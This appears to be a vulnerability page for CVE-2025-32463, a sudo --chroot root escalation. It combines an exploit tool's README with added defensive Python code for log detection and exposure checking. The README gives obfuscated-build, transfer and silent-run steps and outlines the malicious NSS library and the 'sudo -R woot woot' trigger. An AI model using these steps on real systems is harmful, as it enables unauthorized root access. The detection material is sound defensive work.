
CVE-2025-32463 PoC — Sudo Security Vulnerability

Associated Vulnerability

Title: Sudo security vulnerability (CVE-2025-32463)
Description: Sudo before 1.9.17p1 allows local users to obtain root access because /etc/nsswitch.conf from a user-controlled directory is used with the --chroot option.

Description

This CVE covers a vulnerability in sudo versions 1.9.14 to 1.9.17 that enables unauthorized local privilege escalation to root.

Readme
## CVE-2025-32463 Exploit Tool
This repository contains a Go-based exploit tool for **CVE-2025-32463**, a critical privilege escalation vulnerability (CVSS 9.3) in sudo versions **1.9.14 to 1.9.17**.  
The tool allows local users to gain root access by exploiting a flaw in the `--chroot (-R)` option of sudo.  
This tool is intended for **educational and testing purposes only in controlled, isolated environments**.

>  **Warning**: Use this tool only in environments where you have **explicit permission** to test (e.g., virtual machines or lab setups). Unauthorized use on systems you do not own is **illegal and unethical**. Always take **snapshots** of your testing environment and **update sudo after testing**.

---

### Prerequisites

To use this tool, ensure the following are installed on your system:

- **Go**: Version 1.2 or higher  
  `sudo apt install golang`  
- **gcc**: For compiling the malicious C library  
  `sudo apt install gcc`  
- **libc-dev**: For C library headers  
  `sudo apt install libc-dev`  
- **sudo**: Version between 1.9.14 and 1.9.17 
- **User Permissions**: A non-privileged user with sudo access and `--chroot (-R)` allowed  
- **No Security Restrictions**: SELinux/AppArmor must not block shared library loading  

---

## Setup Instructions

Follow these steps to clone, compile, obfuscate, and deploy the tool securely.

### 1. Clone the Repository

```bash
git clone https://github.com/Nowafen/CVE-2025-32463.git
cd CVE-2025-32463
```

---

### 2. Secure Compilation

To make reverse engineering difficult, we recommend compiling the binary with obfuscation using `garble` or optimizing Go build flags.

#### Option 1: Basic Compilation

```bash
go build -o exploit
```

#### Option 2: Obfuscated Compilation with Garble

```bash
go install mvdan.cc/garble@latest
garble -tiny -literals -seed=random build -o exploit
```

- `-tiny`: Minimizes debug information.  
- `-literals`: Obfuscates string literals.  
- `-seed=random`: Randomizes obfuscation for uniqueness.  

#### Option 3: Optimized Go Build

```bash
go build -ldflags="-s -w" -o exploit
```

- `-s`: Strips symbol table.  
- `-w`: Strips DWARF debugging info.  

---

### 3. Deploy to Target System

#### Create a Test User (on the target system)

```bash
sudo adduser --home /home/testuser --shell /bin/bash testuser
sudo usermod -aG sudo testuser
```

> Ensure `--chroot (-R)` is not restricted in `/etc/sudoers`.

#### Transfer the Binary

```bash
scp exploit testuser@target:/home/testuser/exploit
```

#### Install Dependencies on Target

```bash
sudo apt update
sudo apt install gcc libc-dev
```

---

### 4. Run the Exploit

Run the binary as the non-privileged user on the target system. Available flags:

- `--help`: Show detailed usage instructions.  
- `--about`: Display CVE details.  
- `--execution`: Execute the exploit.  
- `--silent`: Run silently without logo or process output (requires `--execution`).  

#### Examples

**Show Help:**
```bash
./exploit --help
```

**Show CVE Details:**
```bash
./exploit --about
```

**Run Exploit (Normal Mode):**
```bash
./exploit --execution
```

On success, a **root shell (`#` prompt)** follows.

**Run Exploit (Silent Mode):**
```bash
./exploit --execution --silent
```

> Output: None (except the root shell if successful)

---

### 5. Verify Success

In the root shell, check for root access:

```bash
id
whoami
```

**Expected Output:**
```
uid=0(root) gid=0(root) groups=0(root),1001(testuser)
root
```

---

## How It Works

The tool exploits CVE-2025-32463 by:

1. Creating a temporary directory `/tmp/sudowoot.stage.*`.
2. Generating a malicious C library `woot1337.c` that sets `uid=0`, `gid=0`, and executes `/bin/bash`.
3. Setting up a fake chroot environment with `nsswitch.conf` and `/etc/group`.
4. Compiling the C code into a shared library `libnss_/woot1337.so.2`.
5. Running `sudo -R woot woot` to load the malicious library and gain a root shell.
6. Cleaning up temporary files automatically.

> Requires: Vulnerable sudo version (1.9.14 - 1.9.17), gcc, libc-dev, and sudo -R permissions.
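Steps 3 to 5 above describe the observable pattern on the defender's side: a chroot that resolves into a user-controlled directory and a bare command name rather than an absolute path. The following detection logic is an added example, not code from this repository; it parses sudoers-style log lines and flags chroot use that resolves into a user-writable location. It assumes sudoers records a `CHROOT=` field next to `TTY`, `PWD`, `USER` and `COMMAND` when `-R` is used, and that a relative chroot argument is taken relative to the logged `PWD`; the lines in `SAMPLE_LOG` are constructed for the demo, not captured from a real host.

```python
"""Detection over sudo log lines for suspicious --chroot (-R) use.

Added example, not part of the repository. Assumption: sudoers logs a
"CHROOT=<dir>" field alongside TTY/PWD/USER/COMMAND whenever -R is used.
SAMPLE_LOG below is constructed for the demo.
"""
import os
import re
import sys
from typing import Dict, Iterable, List, Optional

# Matches "... sudo: <invoking user> : KEY=VAL ; KEY=VAL ; ..." in syslog output.
SUDO_LINE_RE = re.compile(r"sudo:\s+(?P<user>\S+)\s*:\s*(?P<fields>.*)$")

# Locations an unprivileged user can populate; a chroot rooted here is the
# condition the CVE description above calls "a user-controlled directory".
USER_WRITABLE_PREFIXES = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/")

SAMPLE_LOG = [
    # constructed: ordinary sudo use, no chroot involved
    "Jul  1 10:00:01 lab sudo: testuser : TTY=pts/0 ; PWD=/home/testuser ; "
    "USER=root ; COMMAND=/usr/bin/apt update",
    # constructed: chroot into an admin-owned jail with an absolute command
    "Jul  1 10:00:05 lab sudo: testuser : TTY=pts/0 ; PWD=/home/testuser ; "
    "USER=root ; CHROOT=/srv/jail ; COMMAND=/bin/ls",
    # constructed: relative chroot from a /tmp staging dir plus a bare command
    # name, the shape step 5 above produces
    "Jul  1 10:00:09 lab sudo: testuser : TTY=pts/0 ; "
    "PWD=/tmp/sudowoot.stage.Ab12Cd ; USER=root ; CHROOT=woot ; COMMAND=woot",
]


def parse_sudo_line(line: str) -> Optional[Dict[str, str]]:
    """Split one sudo syslog line into a dict of its ' ; '-separated fields."""
    m = SUDO_LINE_RE.search(line)
    if not m:
        return None
    rec: Dict[str, str] = {"user": m.group("user")}
    for field in m.group("fields").split(" ; "):
        key, sep, value = field.partition("=")
        if sep:  # fields without '=' (e.g. free text) are ignored
            rec[key.strip()] = value.strip()
    return rec


def classify_chroot_use(rec: Dict[str, str]) -> Optional[Dict[str, object]]:
    """Return a finding for a record that used -R, or None if it did not."""
    chroot = rec.get("CHROOT")
    if not chroot:
        return None
    # Assumption: a relative -R argument is resolved against the caller's cwd.
    if not chroot.startswith("/"):
        chroot = os.path.normpath(os.path.join(rec.get("PWD", "/"), chroot))
    reasons: List[str] = []
    if chroot.startswith(USER_WRITABLE_PREFIXES):
        reasons.append("chroot resolves to a user-writable location")
    command = rec.get("COMMAND", "")
    if not command.startswith("/"):
        reasons.append("command is not an absolute path")
    return {
        "user": rec["user"],
        "chroot": chroot,
        "command": command,
        "severity": "HIGH" if reasons else "INFO",
        "reasons": reasons,
    }


def scan_sudo_log(lines: Iterable[str]) -> List[Dict[str, object]]:
    """Return one finding per line that used -R; HIGH ones need a look."""
    findings: List[Dict[str, object]] = []
    for line in lines:
        rec = parse_sudo_line(line)
        if rec is None:
            continue
        finding = classify_chroot_use(rec)
        if finding is not None:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    # Pipe /var/log/auth.log (or journalctl -u sudo output) in; with no stdin
    # data the constructed sample is scanned instead.
    source = sys.stdin if not sys.stdin.isatty() else SAMPLE_LOG
    for f in scan_sudo_log(source):
        print(f"{f['severity']:4} user={f['user']} chroot={f['chroot']} "
              f"command={f['command']} reasons={f['reasons']}")
```

Every `-R` use is reported, with `INFO` for chroots under admin-owned paths and absolute commands, so a site that legitimately allows `use_chroot` can tune `USER_WRITABLE_PREFIXES` to its own layout; on a host where `Defaults !use_chroot` is set, any `CHROOT=` field at all is worth raising.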

---

## Safety Precautions

- **Isolated Environment**: Run only in a VM or Docker container (e.g., clone PoC image from `pr0v3rbs/CVE-2025-32463_chwoot`).  
- **Snapshot**: Take a VM snapshot before testing to revert changes.  
- **Update After Testing**:  
  ```bash
  sudo apt update
  sudo apt install sudo
  ```

- **Disable Chroot** (if update not possible):  
  ```bash
  echo "Defaults !use_chroot" | sudo tee -a /etc/sudoers
  ```
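A defender-side exposure check for the two conditions this README names: an affected sudo version (1.9.14 to 1.9.17 in the Prerequisites, with 1.9.17p1 as the first fixed release per the vulnerability description) and `use_chroot` still enabled, the setting the `Defaults !use_chroot` line above turns off. This is an added example, not code from the repository; it assumes `sudo --version` prints a first line of the form `Sudo version 1.9.15p5`, and the `check_host` wrapper, the `/etc/sudoers` path it reads and the sample strings are the example's own.

```python
"""Exposure check for CVE-2025-32463: affected sudo version + chroot enabled.

Added example, not part of the repository. Assumptions: the affected range is
the one the README states (1.9.14 .. 1.9.17, fixed in 1.9.17p1) and the first
line of `sudo --version` reads "Sudo version X.Y.Zp N".
"""
import re
import subprocess
from typing import Optional, Tuple

Version = Tuple[int, int, int, int]  # major, minor, patch, p-level

VERSION_RE = re.compile(r"^Sudo version (\d+)\.(\d+)\.(\d+)(?:p(\d+))?")
# An uncommented "Defaults ... !use_chroot" line disables -R globally.
CHROOT_OFF_RE = re.compile(r"^\s*Defaults\b.*!use_chroot\b")


def parse_sudo_version(first_line: str) -> Optional[Version]:
    """Turn 'Sudo version 1.9.15p5' into (1, 9, 15, 5); None if unparsable."""
    m = VERSION_RE.match(first_line.strip())
    if not m:
        return None
    major, minor, patch, plevel = m.groups()
    return int(major), int(minor), int(patch), int(plevel or 0)


def is_affected_version(version: Version) -> bool:
    """True for 1.9.14 through 1.9.17; 1.9.17p1 and later p-levels are fixed."""
    major, minor, patch, plevel = version
    if (major, minor) != (1, 9):
        return False
    if not 14 <= patch <= 17:
        return False
    return not (patch == 17 and plevel >= 1)


def chroot_disabled_in_sudoers(sudoers_text: str) -> bool:
    """True if the given sudoers content contains a live '!use_chroot' default."""
    return any(CHROOT_OFF_RE.match(line) for line in sudoers_text.splitlines())


def assess(version_line: str, sudoers_text: str) -> str:
    """Combine both checks into one verdict string."""
    ver = parse_sudo_version(version_line)
    if ver is None:
        return "unknown: could not parse sudo version"
    if not is_affected_version(ver):
        return "not affected by version (check distro backports separately)"
    if chroot_disabled_in_sudoers(sudoers_text):
        return "affected version, but chroot disabled via Defaults !use_chroot"
    return "EXPOSED: affected version and chroot still enabled; update sudo"


def check_host() -> str:
    """Run the check against the local host (hypothetical wrapper; needs root)."""
    out = subprocess.run(["sudo", "--version"], capture_output=True,
                         text=True, check=False).stdout
    first = out.splitlines()[0] if out else ""
    try:
        with open("/etc/sudoers") as fh:
            sudoers = fh.read()
    except OSError:
        sudoers = ""  # unreadable: treated as "no !use_chroot seen"
    return assess(first, sudoers)


if __name__ == "__main__":
    print(check_host())
```

Run it as root so `/etc/sudoers` is readable. It does not follow `@include`/`#include` directives, so a `!use_chroot` placed under `/etc/sudoers.d` is not seen, and a version-only test cannot see distributions that backport the fix without changing the version string, so confirm with the package changelog. When adding the `Defaults !use_chroot` line, prefer `visudo`, which validates the file before saving, over a `tee -a` append; at minimum run `visudo -c` afterwards, since a syntax error in `/etc/sudoers` locks everyone out of sudo.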

---

## References

- [NVD - CVE-2025-32463](https://nvd.nist.gov/vuln/detail/CVE-2025-32463)
- [github.com/kh4sh3i](https://github.com/kh4sh3i/CVE-2025-32463)